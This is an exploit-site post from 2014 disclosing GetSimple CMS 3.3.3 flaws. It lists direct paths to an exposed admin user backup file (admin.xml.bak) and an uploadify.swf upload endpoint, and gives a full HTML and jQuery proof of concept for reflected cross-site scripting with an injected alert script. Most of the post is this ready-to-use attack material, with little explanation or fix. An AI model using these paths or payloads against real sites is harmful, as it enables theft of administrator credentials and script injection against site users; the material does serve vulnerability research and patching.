Home / exploits Get Simple CMS 3.3.3 Information Disclosure / XSS
Posted on 28 September 2014
GetSimpleCMS_3.3.3 multi Vulnerability ====================================== Author : indoushka Vondor : http://get-simple.info/ Dork: © 2009-2014 GetSimple CMS – Version 3.3.3 ================================================== info : http://127.0.0.1/GetSimpleCMS3/backups/users/admin.xml.bak upload : http://127.0.0.1/GetSimpleCMS/admin/template/js/uploadify/uploadify.swf XSS Reflected - Jquery v1.7.1 : <html> <head> <meta charset="utf-8"> <title>XSS Reflected - Jquery v1.7.1 </title> <script src="http://127.0.0.1/GetSimpleCMS3/admin/template/js/jquery.min.js"></script> <script> $(function() { $('#users').each(function() { var select = $(this); var option = select.children('option').first(); select.after(option.text()); select.hide(); }); }); </script> </head> <body> <form method="post"> <p> <select id="users" name="users"> <option value="xssreflected"><script>alert('xss reflected - jquery v1.7.1 by - indoushka thnx to @firebitsbr - mauro.risonho@gmail.com');</script></option> </select> </p> </form> </body> </html>
